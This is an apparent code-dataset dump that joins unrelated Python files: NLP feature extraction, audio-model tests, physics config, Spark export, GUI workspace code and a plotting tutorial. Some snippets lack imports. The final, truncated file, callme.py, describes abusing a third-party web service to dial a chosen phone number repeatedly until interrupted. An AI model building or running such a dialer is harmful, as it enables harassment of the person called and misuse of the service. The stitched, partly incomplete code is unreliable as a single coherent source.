import re
class RoNumTypeEnum(Enum):
    # Romanian numeral types: cardinal (CARD) vs. ordinal (ORD).
    CARD = auto()
    ORD = auto()
class RoPOSFeatureNumType(POSFeature):
    """POS feature extracting the Romanian numeral type ("NumType=") from a tag."""

    _INSTANCE = None

    # Maps the NumType values found in tags to their enum members; any
    # other value in the tag is silently ignored.
    _FORM_TO_ENUM = {'Card': RoNumTypeEnum.CARD, 'Ord': RoNumTypeEnum.ORD}

    def __init__(self):
        POSFeature.__init__(self, lang=Lang.RO, name=RoFeaturesName.NRT,
                            values=None, pos_supported=None)
        self.values = {ro_nr_type for _, ro_nr_type in RoNumTypeEnum.__members__.items()}
        self.pos_supported = {POS.NUM}

    @classmethod
    def get_instance(cls) -> "RoPOSFeatureNumType":
        """Lazily create and return the shared singleton instance."""
        if cls._INSTANCE is None:
            cls._INSTANCE = RoPOSFeatureNumType()
        return cls._INSTANCE

    def get_values(self, tag: str) -> List[RoNumTypeEnum]:
        """Return the NumType values present in *tag*, in order of appearance."""
        match = re.search('(NumType=[a-zA-Z,]*){1}', tag)
        if match is None:
            return []
        forms = match.group(0).split('=')[1].split(',')
        return [self._FORM_TO_ENUM[form] for form in forms if form in self._FORM_TO_ENUM]
9747614 | <filename>DeepFilterNet/df/scripts/test_df.py
#!/usr/bin/env python
import os
import unittest
from typing import Dict, List, Union
import numpy as np
import torch
from loguru import logger
import df
from df.enhance import DF, enhance, init_df, load_audio
from df.evaluation_utils import composite, si_sdr_speechmetrics, stoi
# Absolute tolerance shared by all metric comparisons below.
__a_tol = 1e-4
def eval_composite(clean, enhanced, sr, m_target: List[float]):  # type: ignore
    """Check the composite speech metrics of *enhanced* against *m_target*.

    The octave-backed variant is optional; when octave is unavailable only
    the pure-Python metrics are compared.
    """
    logger.info("Computing composite metrics")
    clean_np = clean.squeeze(0).numpy()
    enhanced_np = enhanced.squeeze(0).numpy()
    try:
        m_enh_octave = torch.as_tensor(
            composite(clean_np, enhanced_np, sr, use_octave=True)
        ).to(torch.float32)
    except (OSError, ImportError, ModuleNotFoundError):
        m_enh_octave = None
        logger.warning("No octave available")
    m_enh = torch.as_tensor(composite(clean_np, enhanced_np, sr)).to(torch.float32)
    logger.info(f"Got {m_enh}")
    m_target: torch.Tensor = torch.as_tensor(m_target)
    assert torch.isclose(
        m_enh, m_target, atol=__a_tol
    ).all(), f"Metric output not close. Expected {m_target}, got {m_enh}, diff: {m_target-m_enh}"
    if m_enh_octave is not None:
        assert torch.isclose(
            m_enh_octave, m_target, atol=__a_tol
        ).all(), (
            f"Metric output not close. Expected {m_target}, got {m_enh}, diff: {m_target-m_enh}"
        )
def eval_pystoi(clean, enhanced, sr, m_target: float):
    """Check the STOI score of *enhanced* against the expected *m_target*."""
    logger.info("Computing STOI")
    m_enh = stoi(clean.squeeze(0), enhanced.squeeze(0), sr)
    logger.info(f"Got {m_enh}")
    is_close = np.isclose([m_enh], [m_target], atol=__a_tol)
    assert is_close, f"Metric output not close. Expected {m_target}, got {m_enh}, diff: {m_target-m_enh}"
def eval_sdr(clean, enhanced, m_target: float):
    """Check the SI-SDR score of *enhanced* against the expected *m_target*."""
    logger.info("Computing SI-SDR")
    m_enh = si_sdr_speechmetrics(clean.numpy(), enhanced.numpy())
    logger.info(f"Got {m_enh}")
    is_close = np.isclose([m_enh], [m_target])
    assert is_close, f"Metric output not close. Expected {m_target}, got {m_enh}, diff: {m_target-m_enh}"
# Expected metrics per pretrained model, pinned to the bundled test clips.
# "composite" holds [PESQ-like, CSIG, CBAK, COVL, segSNR] values (order as
# returned by df.evaluation_utils.composite — confirm against that module).
TARGET_METRICS = {
    "DeepFilterNet": {
        "composite": [
            2.30728650093078,
            3.83064246177673,
            2.36408281326293,
            3.05453467369079,
            -2.7631254196166,
        ],
        "stoi": 0.9689496585281197,
        "sdr": 18.88543128967285,
    },
    "DeepFilterNet2a": {
        "composite": [
            2.86751246452332,
            4.03339815139771,
            2.56429362297058,
            3.41470885276794,
            -2.79574084281921,
        ],
        "stoi": 0.9707452525900906,
        "sdr": 13.40160727500915,
    },
    "DeepFilterNet2b": {
        "composite": [
            2.87229919433594,
            4.15724086761475,
            2.62931561470032,
            3.48965477943420,
            -2.28056311607361,
        ],
        "stoi": 0.9733591821902137,
        "sdr": 13.59861135482788,
    },
}
def _load_model(df_dir: str, model_n: str):
    """Load the pretrained model *model_n* from the repo's pretrained_models dir."""
    base_dir = os.path.join(df_dir, "pretrained_models", model_n)
    model, df_state, _ = init_df(base_dir, config_allow_defaults=True)
    logger.info(f"Loaded model {model_n}")
    return model, df_state
class TestDfModels(unittest.TestCase):
    # Regression tests: each pretrained model must reproduce its pinned metrics.
    @classmethod
    def setUpClass(cls):
        # Load every model once for the whole test class (loading is slow).
        # NOTE(review): returning cls from setUpClass is unusual and appears
        # to have no effect under unittest.
        torch.set_printoptions(precision=14, linewidth=120)
        cls.df_dir = os.path.abspath(os.path.join(os.path.dirname(df.__file__), os.pardir))
        cls.models = {m: _load_model(cls.df_dir, m) for m in TARGET_METRICS.keys()}
        return cls
    def _test_model(
        self,
        model: torch.nn.Module,
        df_state: DF,
        target_metrics: Dict[str, Union[float, List[float]]],
    ):
        # Enhance the bundled noisy clip and compare all metrics against the
        # pinned targets for this model.
        sr = df_state.sr()
        logger.info("Loading audios")
        noisy, _ = load_audio(
            os.path.join(self.df_dir, os.path.pardir, "assets", "noisy_snr0.wav"), sr
        )
        clean, _ = load_audio(
            os.path.join(self.df_dir, os.path.pardir, "assets", "clean_freesound_33711.wav"), sr
        )
        enhanced = enhance(model, df_state, noisy, pad=True)
        eval_composite(clean, enhanced, sr, target_metrics["composite"])  # type: ignore
        eval_pystoi(clean, enhanced, sr, m_target=target_metrics["stoi"])  # type: ignore
        eval_sdr(clean, enhanced, m_target=target_metrics["sdr"])  # type: ignore
    def test_deepfilternet(self):
        model = "DeepFilterNet"
        self._test_model(*self.models[model], target_metrics=TARGET_METRICS[model])
    def test_deepfilternet2a(self):
        model = "DeepFilterNet2a"
        self._test_model(*self.models[model], target_metrics=TARGET_METRICS[model])
    def test_deepfilternet2(self):
        model = "DeepFilterNet2b"
        self._test_model(*self.models[model], target_metrics=TARGET_METRICS[model])
if __name__ == "__main__":
    # Allow running this module directly: python test_df.py
    unittest.main()
| StarcoderdataPython |
156573 | import math
# For each test case, decide whether two orbits obey Kepler's third law:
# T1^2 / R1^3 must equal T2^2 / R2^3.
t = int(input())
result = []
for _ in range(t):
    T1, T2, R1, R2 = map(int, input().split())
    # Compare with exact integer cross-multiplication instead of the original
    # floating-point ratios (math.pow results compared with ==), which could
    # misjudge equal ratios due to rounding.
    if T1 * T1 * R2 ** 3 == T2 * T2 * R1 ** 3:
        result.append("Yes")
    else:
        result.append("No")
print(*result, sep="\n")
247704 | <reponame>pasmuss/cmssw<filename>RecoMuon/Configuration/python/RecoMuonPPonly_cff.py
import FWCore.ParameterSet.Config as cms
# CMSSW configuration fragment: muon reconstruction sequences for pp running.
# Statement order matters — modules must be defined before the cms.Sequence
# objects that reference them.
# Seed generator
from RecoMuon.MuonSeedGenerator.standAloneMuonSeeds_cff import *
# Stand alone muon track producer
from RecoMuon.StandAloneMuonProducer.standAloneMuons_cff import *
# refitted stand-alone muons.
refittedStandAloneMuons = standAloneMuons.clone()
refittedStandAloneMuons.STATrajBuilderParameters.DoRefit = True
# Displaced SA muons
from RecoMuon.MuonSeedGenerator.CosmicMuonSeedProducer_cfi import *
displacedMuonSeeds = CosmicMuonSeed.clone()
displacedMuonSeeds.ForcePointDown = False
displacedStandAloneMuons = standAloneMuons.clone()
displacedStandAloneMuons.InputObjects = cms.InputTag("displacedMuonSeeds")
displacedStandAloneMuons.MuonTrajectoryBuilder = cms.string("StandAloneMuonTrajectoryBuilder")
displacedStandAloneMuons.TrackLoaderParameters.VertexConstraint = cms.bool(False)
# Global muon track producer
from RecoMuon.GlobalMuonProducer.GlobalMuonProducer_cff import *
from RecoMuon.Configuration.iterativeTkDisplaced_cff import *
displacedGlobalMuons = globalMuons.clone()
displacedGlobalMuons.MuonCollectionLabel = cms.InputTag("displacedStandAloneMuons","")
displacedGlobalMuons.TrackerCollectionLabel = cms.InputTag("displacedTracks")
# TeV refinement
from RecoMuon.GlobalMuonProducer.tevMuons_cfi import *
# SET Muon tracking
from RecoMuon.Configuration.SETRecoMuon_cff import *
# Muon Id producer
from RecoMuon.MuonIdentification.muonIdProducerSequence_cff import *
muons1stStep.fillGlobalTrackQuality = True
#Muon Id isGood flag ValueMap producer sequence
from RecoMuon.MuonIdentification.muonSelectionTypeValueMapProducer_cff import *
# Muon Isolation sequence
from RecoMuon.MuonIsolationProducers.muIsolation_cff import *
# ---------------------------------------------------- #
################## Make the sequences ##################
# ---------------------------------------------------- #
# Muon Tracking sequence
# NOTE(review): "iterDisplcedTracking" below is spelled without the 'a';
# the name is defined (with the same spelling) in iterativeTkDisplaced_cff.
standalonemuontracking = cms.Sequence(standAloneMuonSeeds*standAloneMuons*refittedStandAloneMuons*displacedMuonSeeds*displacedStandAloneMuons)
displacedGlobalMuonTracking = cms.Sequence(iterDisplcedTracking*displacedGlobalMuons)
globalmuontracking = cms.Sequence(globalMuons*tevMuons*displacedGlobalMuonTracking)
muontracking = cms.Sequence(standalonemuontracking*globalmuontracking)
# Muon Reconstruction
muonreco = cms.Sequence(muontracking*muonIdProducerSequence)
# Muon Reconstruction plus Isolation
muonreco_plus_isolation = cms.Sequence(muonreco*muIsolation)
muonrecoComplete = cms.Sequence(muonreco_plus_isolation*muonSelectionTypeSequence)
# _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- #
# -_-_-_- Special Sequences for Iterative tracking -_-_-_- #
# -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ #
# We need to split the muon sequence above in two, to be able to run the MuonSeeding in the tracker. So muonrecoComplete will
# be run no longer...
#from RecoMuon.MuonIdentification.earlyMuons_cfi import earlyMuons
muonGlobalReco = cms.Sequence(globalmuontracking*muonIdProducerSequence*muonSelectionTypeSequence*muIsolation)
# ... instead, the sequences will be run in the following order:
# 1st - standalonemuontracking
# 2nd - iterative tracking (def in RecoTracker config)
# 3rd - MuonIDProducer with 1&2 as input, with special replacements; the earlyMuons above.
# 4th - MuonSeeded tracks, inside-out and outside-in
# 5th - Merging of the new TK tracks into the generalTracks collection
# 6th - Run the remnant part of the muon sequence (muonGlobalReco)
########################################################
# Phase-2 customisation: append ME0 muon reconstruction to the global sequence.
from RecoMuon.MuonIdentification.me0MuonReco_cff import *
_phase2_muonGlobalReco = muonGlobalReco.copy()
_phase2_muonGlobalReco += me0MuonReco
phase2_muon.toReplaceWith( muonGlobalReco, _phase2_muonGlobalReco )
| StarcoderdataPython |
3260224 | import os
import unittest
from tests.config_reader import read_tpc_config
from wbtools.lib.nlp.literature_index.textpresso import TextpressoLiteratureIndex
# Integration test: only runs when the local Textpresso config file exists.
@unittest.skipIf(not os.path.exists(os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "data",
                                                 "local_config", "textpresso.cfg")),
                 "Textpresso test config file not present")
class TestTextpressoLiteratureIndex(unittest.TestCase):

    def setUp(self) -> None:
        # Build a cached literature index against the configured TPC API.
        config = read_tpc_config()
        self.lit_index = TextpressoLiteratureIndex(api_url=config["tpc"]["api_base_url"],
                                                   api_token=config["tpc"]["api_token"], use_cache=True,
                                                   corpora=[config["tpc"]["corpora"]])

    def test_num_documents(self):
        # Called twice on purpose, presumably so the second call exercises
        # the cache path (use_cache=True above) — confirm with the author.
        self.assertGreater(self.lit_index.num_documents(), 0)
        self.assertGreater(self.lit_index.num_documents(), 0)

    def test_count_matching_documents(self):
        count = self.lit_index.count_matching_documents("DREAM complex")
        self.assertGreater(count, 0)


if __name__ == '__main__':
    unittest.main()
| StarcoderdataPython |
8057235 | <gh_stars>10-100
from .utils import execute_code
def test_LDA_LDM():
    """LDM stores a register into a memory location; LDA loads it back."""
    source = '''
    .data
    .teststr string 'Hello'
    .testnum 20
    .memory_loc 500
    .text
    .global main:
    main:
    LDV A, .testnum
    LDM A, .memory_loc
    LDA B, .memory_loc
    HLT
    '''
    machine = execute_code(source)
    # Register B (index 1) and RAM address 500 both hold .testnum afterwards.
    assert machine.registers.get(1) == 20
    assert machine.RAM.get(500) == 20
def test_LDR():
    """LDR dereferences the address held in one register into another."""
    source = '''
    .data
    .teststr string 'ABCDEF'
    .text
    .global main:
    main:
    LDV A, .teststr
    LDR B, A
    HLT
    '''
    machine = execute_code(source)
    # B (index 1) receives the first byte of the string A points at.
    assert machine.registers.get(1) == ord('A')
    assert machine.RAM.get(machine.registers.get(0)) == ord('A')
def test_LDP():
    """LDP writes a register's value to the address held in another register."""
    source = '''
    .data
    .teststr string 'ABCDEF'
    .replacer string '!'
    .text
    .global main:
    main:
    LDV A, .replacer
    LDR B, A
    LDV A, .teststr
    LDP A, B
    HLT
    '''
    machine = execute_code(source)
    # The first byte of .teststr is overwritten with the '!' character.
    assert machine.kernel.read_string(machine.registers.get(0)) == "!BCDEF"
| StarcoderdataPython |
11277476 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0.html
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import yaml
import argparse
from pyspark import SparkContext, SparkConf, Row
from pyspark.sql.functions import concat_ws, count, lit, col, udf, expr, collect_list, explode
from pyspark.sql import HiveContext
from util import resolve_placeholder
if __name__ == "__main__":
    # Entry point: read the pipeline config, then dump a Hive table to
    # TFRecords on HDFS.
    parser = argparse.ArgumentParser(description='Prepare data')
    parser.add_argument('config_file')
    args = parser.parse_args()
    # Load config file
    with open(args.config_file, 'r') as ymlfile:
        cfg = yaml.load(ymlfile, Loader=yaml.FullLoader)
    # Fill in placeholder values in the loaded config (util.resolve_placeholder).
    resolve_placeholder(cfg)
    cfg_log = cfg['log']
    cfg = cfg['pipeline']
    sc = SparkContext()
    hive_context = HiveContext(sc)
    sc.setLogLevel(cfg_log['level'])
    # save table as tfrecords
    path = cfg['tfrecords']['tfrecords_hdfs_path']
    input_table_name = cfg['normalization']['output_table_name']
    command = """
    SELECT * FROM {}
    """.format(input_table_name)
    df = hive_context.sql(command)
    # Write the whole table as TFRecord Example records, replacing any
    # existing output at `path`.
    df.write.format("tfrecords").option("recordType", "Example").mode('overwrite').save(path)
    sc.stop()
5138931 | from django.contrib import admin
from api.models import DevEvent,DevEventType,DevProject,WeekSummary,SaleActiveType,SaleCustomer,SalePhase,SaleTarget,SaleEvent
import xadmin
# Register your models here.
#class FelixProjectsAdmin(admin.ModelAdmin):
# class ApiProjectsAdmin(object):
# list_display = ('pj_name', 'pj_group', 'pj_category')
# xadmin.site.register(FelixProjects, FelixProjectsAdmin)\
# xadmin.site.register(DevEvent)
# xadmin.site.register(DevEventType)
# xadmin.site.register(DevProject)
# xadmin.site.register(WeekSummary)
# xadmin.site.register(SaleActiveType)
# xadmin.site.register(SaleCustomer)
# xadmin.site.register(SalePhase)
# xadmin.site.register(SaleTarget)
# xadmin.site.register(SaleEvent)
| StarcoderdataPython |
223495 | # --------------------------------------------------------------------------------------
# Copyright 2020 by Oculy Authors, see git history for more details.
#
# Distributed under the terms of the BSD license.
#
# The full license is in the file LICENCE, distributed with this software.
# --------------------------------------------------------------------------------------
"""Simple workspace manifest.
"""
import os
import enaml
from atom.api import Bool, Dict, List, Str, Typed
from enaml.workbench.ui.api import Workspace
from glaze.utils import invoke_command
from glaze.utils.atom_util import (
preferences_from_members,
update_members_from_preferences,
)
from watchdog.events import (
FileCreatedEvent,
FileDeletedEvent,
FileMovedEvent,
FileSystemEventHandler,
)
from watchdog.observers import Observer
from watchdog.observers.api import ObservedWatch
from oculy.data import Dataset
from oculy.io.loader import BaseLoader, BaseLoaderView
from .plot_1d_model import Plot1DPanelModel
from .plot_2d_model import Plot2DPanelModel
with enaml.imports():
from .content import SimpleViewerContent
class FileListUpdater(FileSystemEventHandler):
    """Watchdog event handler keeping the workspace file list up to date.

    Any file creation, deletion or move inside the watched folder triggers a
    refresh of the workspace's ``available_files`` list.
    """

    def __init__(self, workspace):
        self.workspace = workspace

    def on_created(self, event):
        super(FileListUpdater, self).on_created(event)
        if isinstance(event, FileCreatedEvent):
            self.workspace._update_available_files()

    def on_deleted(self, event):
        super(FileListUpdater, self).on_deleted(event)
        if isinstance(event, FileDeletedEvent):
            self.workspace._update_available_files()

    def on_moved(self, event):
        # Fixed: this previously delegated to the parent's ``on_deleted``
        # instead of ``on_moved`` (harmless with the base no-op handler, but
        # wrong and brittle against subclassing/base-class changes).
        super(FileListUpdater, self).on_moved(event)
        if isinstance(event, FileMovedEvent):
            self.workspace._update_available_files()
class SimpleViewerWorkspace(Workspace):
    """State of the simple viewer workspace.

    Tracks the selected folder/file/loader, keeps the file list in sync with
    the filesystem through a watchdog observer, and owns the 1D/2D plot panel
    models.
    """

    #: Currently selected folder in which to look for data.
    selected_folder = Str().tag(pref=True)

    #: List of files in the selected folder.
    available_files = List(str).tag(pref=True)

    #: Are the files filtered so as to display only files for which a loader exist.
    should_filter_files = Bool(True).tag(pref=True)

    #: Currently selected file.
    selected_file = Str().tag(pref=True)

    #: Loader ids.
    matching_loaders = List(str).tag(pref=True)

    #: Are the loader ids filtered to match the selected file.
    should_filter_loaders = Bool(True).tag(pref=True)

    #: Id of the currently selected loader.
    selected_loader = Str().tag(pref=True)

    #: Should data be loaded automatically.
    auto_load = Bool().tag(pref=True)

    #: Flag signaling that a file change is about to happen.
    file_changing = Bool()

    #: Content of the loaded file. This dict is never updated in place and
    #: can hence be safely observed.
    file_content = Dict()

    # Set up methods used for handling preferences
    update_members_from_preferences = update_members_from_preferences
    preferences_from_members = preferences_from_members

    def start(self):
        """Initialize the datastore nodes, plot models and UI content."""
        datastore = self.workbench.get_plugin("oculy.data").datastore
        # Create nodes used to store data related to this workspace's plots.
        datastore.store_data(
            {
                "_simple_viewer/1d": (Dataset(), None),
                "_simple_viewer/2d": (Dataset(), None),
            }
        )
        self._1d_plots = Plot1DPanelModel(self, datastore)
        self._2d_plots = Plot2DPanelModel(self, datastore)
        self.content = SimpleViewerContent(workspace=self)

    def stop(self):
        """Release the datastore nodes owned by this workspace."""
        datastore = self.workbench.get_plugin("oculy.data").datastore
        datastore.store_data({"_simple_viewer/1d": (None, None)})
        datastore.store_data({"_simple_viewer/2d": (None, None)})

    def get_loader_view(self) -> BaseLoaderView:
        """Get a config view for the current loader."""
        if self._loader is None:
            self._create_loader()
        return invoke_command(
            self.workbench,
            "oculy.io.create_loader_config",
            {"id": self.selected_loader, "loader": self._loader},
            self._loader,
        )

    def load_file(self):
        """Create a loader for the selected file and determine its entries."""
        if self._loader is None:
            self._create_loader()
        self._loader.determine_content()
        # Flag the transition so observers of file_content can ignore it.
        self.file_changing = True
        self.file_content = self._loader.content
        self.file_changing = False

    # --- Private API

    #: Loader in charge of performing io for the selected file.
    _loader = Typed(BaseLoader)

    #: Watchdog observer monitoring the currently selected folder.
    _watchdog = Typed(Observer, ())

    #: Handler for watchdog events.
    _watchdog_handler = Typed(FileListUpdater)

    #: Watch of the watchdog.
    _watchdog_watch = Typed(ObservedWatch)

    #: Cache of loader parameters used by the user in this session.
    #: Cross-session persistence should be handled through the io plugin.
    _loader_state_cache = Dict(str)

    #: State of the 1D plots
    _1d_plots = Typed(Plot1DPanelModel)

    #: State of the 2D plot
    _2d_plots = Typed(Plot2DPanelModel)

    def _update_available_files(self):
        """Update the list of available files."""
        files = []
        trim = len(self.selected_folder) + 1
        exts = self.workbench.get_plugin("oculy.io").supported_extensions
        for dirpath, dirnames, filenames in os.walk(self.selected_folder):
            files.extend(
                sorted(
                    [
                        # Ensure we always get a full path by joining filename and
                        # selected dir
                        os.path.join(dirpath, f)[trim:]
                        for f in filenames
                        # Skip next branch if filtering is not required
                        if (not self.should_filter_files)
                        or any(f.endswith(ext) for ext in exts)
                    ]
                )
            )
        self.available_files = files
        if self.selected_file not in files:
            self.selected_file = files[0] if files else ""

    def _update_matching_loaders(self):
        """Update the list of loaders matching the selected file."""
        matching, preferred = invoke_command(
            self.workbench,
            "oculy.io.list_matching_loaders",
            {"filename": self.selected_file},
        )
        self.matching_loaders = matching
        if self.selected_loader not in matching:
            # Fixed: guard against an empty matching list, which used to
            # raise IndexError when no loader knew the file's extension.
            self.selected_loader = preferred or (matching[0] if matching else "")

    def _create_loader(self):
        """Create a loader matching the current file/loader selection."""
        self._loader = invoke_command(
            self.workbench,
            "oculy.io.create_loader",
            {
                "id": self.selected_loader,
                "path": os.path.join(self.selected_folder, self.selected_file),
            },
        )

    def _post_setattr_selected_folder(self, old, new):
        """Ensure the available file list is up to date and remains so."""
        if self._watchdog_watch:
            self._watchdog.unschedule(self._watchdog_watch)
        self._update_available_files()
        self._watchdog_watch = self._watchdog.schedule(self._watchdog_handler, new)
        if not self._watchdog.is_alive():
            self._watchdog.start()

    def _post_setattr_should_filter_files(self, old, new):
        """Ensure the available file list respects filtering."""
        self._update_available_files()

    def _post_setattr_selected_file(self, old, new):
        """Ensure the loader list matches the selected file."""
        self._update_matching_loaders()
        if self._loader is not None:
            self._loader.path = os.path.join(self.selected_folder, self.selected_file)
        if self.auto_load:
            self.load_file()

    def _post_setattr_should_filter_loaders(self, old, new):
        """Ensure the matching loader list respects filtering."""
        self._update_matching_loaders()

    def _post_setattr_selected_loader(self, old, new):
        """Discard the previously created loader, caching its parameters."""
        if self._loader:
            # Fixed: this used to read ``self.loader``, which does not exist
            # on this class (the member is ``_loader``), raising
            # AttributeError the first time the user switched loader.
            self._loader_state_cache[old] = self._loader.preferences_from_members()
        self._loader = None

    def _post_setattr_auto_load(self, old, new):
        """Ensure we auto-load the relevant file when auto_load is enabled.

        Renamed from ``_post_set_auto_load``: Atom only invokes post-set
        hooks named ``_post_setattr_<member>``, so the old spelling was
        never called.
        """
        if new and self.selected_folder and self.selected_file and self.selected_loader:
            self.load_file()

    def _default__watchdog_handler(self):
        """Build the watchdog handler bound to this workspace."""
        return FileListUpdater(workspace=self)
| StarcoderdataPython |
1897095 | <filename>src/python/nimbusml/tests/pipeline/test_pipeline_get_schema.py
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# --------------------------------------------------------------------------------------------
import unittest
import numpy as np
import pandas as pd
from nimbusml import Pipeline, FileDataStream
from nimbusml.datasets import get_dataset
from nimbusml.feature_extraction.categorical import OneHotVectorizer
from nimbusml.linear_model import OnlineGradientDescentRegressor
from nimbusml.preprocessing.filter import RangeFilter
# Toy training frame shared by the tests below: one categorical column
# ('c0') and two numeric columns ('c1', 'c2') cast to float64.
train_data = {'c0': ['a', 'b', 'a', 'b'],
              'c1': [1, 2, 3, 4],
              'c2': [2, 3, 4, 5]}
train_df = pd.DataFrame(train_data).astype({'c1': np.float64,
                                            'c2': np.float64})
class TestPipelineGetSchema(unittest.TestCase):
    """Tests for ``Pipeline.get_output_columns()``."""

    def test_get_schema_returns_correct_value_for_single_valued_columns(self):
        # A transform-only pipeline exposes the scalar output columns.
        df = train_df.drop(['c0'], axis=1)
        pipeline = Pipeline([RangeFilter(min=0.0, max=4.5) << 'c2'])
        pipeline.fit(df)
        df = pipeline.transform(df)
        schema = pipeline.get_output_columns()
        self.assertIn('c1', schema)
        self.assertIn('c2', schema)
        self.assertEqual(len(schema), 2)

    def test_get_schema_returns_correct_value_for_vector_valued_columns(self):
        # OneHotVectorizer expands 'c0' into one slot per category.
        pipeline = Pipeline([OneHotVectorizer() << 'c0'])
        pipeline.fit(train_df)
        schema = pipeline.get_output_columns()
        self.assertIn('c0.a', schema)
        self.assertIn('c0.b', schema)
        self.assertIn('c1', schema)
        self.assertIn('c2', schema)
        self.assertEqual(len(schema), 4)

    def test_get_schema_does_not_work_when_predictor_is_part_of_model(self):
        # A pipeline ending in a predictor has no transform output schema,
        # so get_output_columns must raise. assertRaises replaces the old
        # try/except-pass/else-fail construct, which silently swallowed the
        # exception details.
        df = train_df.drop(['c0'], axis=1)
        pipeline = Pipeline([OnlineGradientDescentRegressor(label='c2')])
        pipeline.fit(df)
        with self.assertRaises(Exception):
            pipeline.get_output_columns()
if __name__ == '__main__':
    unittest.main()  # allow running this test module directly
| StarcoderdataPython |
5117905 | <filename>src/bpp/tests/tests_legacy/test_util.py
# -*- encoding: utf-8 -*-
from django.test import TestCase
from model_mommy import mommy
from bpp.models import Autor
from bpp.util import get_copy_from_db, has_changed, slugify_function
class TestUtil(TestCase):
    """Unit tests for the helper functions in ``bpp.util``."""

    def test_slugify_function(self):
        # Punctuation and control characters are stripped from the slug.
        raw = "<NAME>,,()*':;\r\n[]"
        expected = "Waldemar-A-Lacki"
        self.assertEqual(slugify_function(raw), expected)

    def test_slugify_function_double_dash(self):
        raw = "<NAME>"
        expected = "Andrzej-Wrobel"
        self.assertEqual(slugify_function(raw), expected)

    def test_get_copy_from_db(self):
        # The copy fetched from the database shares the primary key.
        original = mommy.make(Autor)
        fetched = get_copy_from_db(original)
        self.assertEqual(original.pk, fetched.pk)

    def test_has_changed(self):
        autor = mommy.make(Autor)
        self.assertEqual(has_changed(autor, "nazwisko"), False)
        autor.nazwisko = "Foo"
        self.assertEqual(has_changed(autor, "nazwisko"), True)
        autor.save()
        # After saving, neither field differs from the database copy.
        self.assertEqual(has_changed(autor, ["nazwisko", "imiona"]), False)
        autor.imiona = "Bar"
        self.assertEqual(has_changed(autor, ["nazwisko", "imiona"]), True)
| StarcoderdataPython |
173795 | """Collection of apicast gateways with different deployments or options"""
# flake8: noqa
from .system import SystemApicast, SystemApicastRequirements
from .containers import ContainerizedApicast
from .operator import OperatorApicast, OperatorApicastRequirements
from .selfmanaged import SelfManagedApicast, SelfManagedApicastRequirements
from .template import TemplateApicast, TemplateApicastRequirements
from .tls import TLSApicast, TLSApicastRequirements
| StarcoderdataPython |
3477627 | # -*- coding: utf-8 -*-
"""
.. _tutorial06_ref:
Tutorial 6: Regions and Parcellations
=====================================
This tutorial demonstrates how to plot brain regions.
Regions and parcellations can be plotted with ``brainplot`` as one or more
layers, and it's possible to add region outlines by simply adding a layer with
the `as_outline` parameter.
Parcellations
-------------
Multiple brain regions can be plotted as a single layer as long as the vertices
in different regions have different numerical labels/values, which is typical
for any parcelation. To demonstrate, we can use the
:func:`~brainspace.datasets.load_parcellation` from ``Brainspace`` to load the
`Schaefer 400 parcellation`_.
"""
from neuromaps.datasets import fetch_fslr
from surfplot import Plot
from brainspace.datasets import load_parcellation
# fetch the fsLR surfaces and plot both hemispheres of the inflated mesh
surfaces = fetch_fslr()
lh, rh = surfaces['inflated']
p = Plot(lh, rh)
# add schaefer parcellation (no color bar needed)
lh_parc, rh_parc = load_parcellation('schaefer')
p.add_layer({'left': lh_parc, 'right': rh_parc}, cbar=False)
fig = p.build()
fig.show()
###############################################################################
# Now can add a second layer of just the region outlines. This is done by
# setting `as_outline=True`. The color of the outlines are set by the `cmap`
# parameter, as with any data. To show black outlines, we can just use the
# `gray` colormap.
# as_outline=True draws only the region borders; with the 'gray' colormap
# the outlines render as black on top of the parcellation layer below
p.add_layer({'left': lh_parc, 'right': rh_parc}, cmap='gray',
            as_outline=True, cbar=False)
fig = p.build()
fig.show()
###############################################################################
# Regions of Interest
# -------------------
#
# Often times we want to show a selection of regions, instead of all regions.
# These could be regions from a parcellation, regions defined from a
# functional localizer, etc.
#
# Let's select two regions from the Schaefer parcellation and zero-out the
# remaining regions. We'll just stick with the left hemisphere here.
import numpy as np
region_numbers = [71, 72]
# zero-out all regions except 71 and 72 (np.isin builds a boolean mask of
# vertices belonging to the selected labels)
regions = np.where(np.isin(lh_parc, region_numbers), lh_parc, 0)
###############################################################################
# Although we can use a pre-defined color map, we might want to define a
# custom colormap where we can define the exact color for each region. This is
# possible using ``matplotlib``:
from matplotlib.colors import LinearSegmentedColormap
colors = ['orange', 'steelblue']
# N=2 gives one discrete color per selected region; presumably colors map to
# regions in ascending label order (orange -> 71, steelblue -> 72) -- verify
cmap = LinearSegmentedColormap.from_list('regions', colors, N=2)
###############################################################################
# Now we can plot both regions with their outlines:
# only need to show the left lateral view
p = Plot(lh, views='lateral')
# filled regions first, then their outlines layered on top
p.add_layer(regions, cmap=cmap, cbar=False)
p.add_layer(regions, cmap='gray', as_outline=True, cbar=False)
fig = p.build()
fig.show()
# sphinx_gallery_thumbnail_number = 3
###############################################################################
# .. note::
# Multiple regions can also be plotted as individual layers, rather
# than combined as a single layer, as shown here. In this case, the vertex
# array(s) for each layer would be binary.
#
# .. _Schaefer 400 parcellation: https://github.com/ThomasYeoLab/CBIG/tree/master/stable_projects/brain_parcellation/Schaefer2018_LocalGlobal | StarcoderdataPython |
374265 | '''
(ab)uses wheresmycellphone.com to call a phone
'''
import urllib2,urllib,sys,time
def usage():
    """Print command-line help for the script (Python 2 print statement)."""
    print '''
Dials a phone number at specified intervals forever (until ctrl+c).
Usage: callme.py <number> <delay>
E.G.: callme.py 3015551234 90
Number: A phone number, no punctuation or spaces
Delay: How many seconds between call attempts (recommend 70 seconds or more
to allow ring out)
    '''
def call_forever(number,wait):
    '''
    Dial NUMBER every WAIT seconds, forever, unless
    we get 4 non-OK responses from the server.

    NOTE(review): this loops until interrupted; using it against a number
    you do not own amounts to phone harassment, so no functional changes
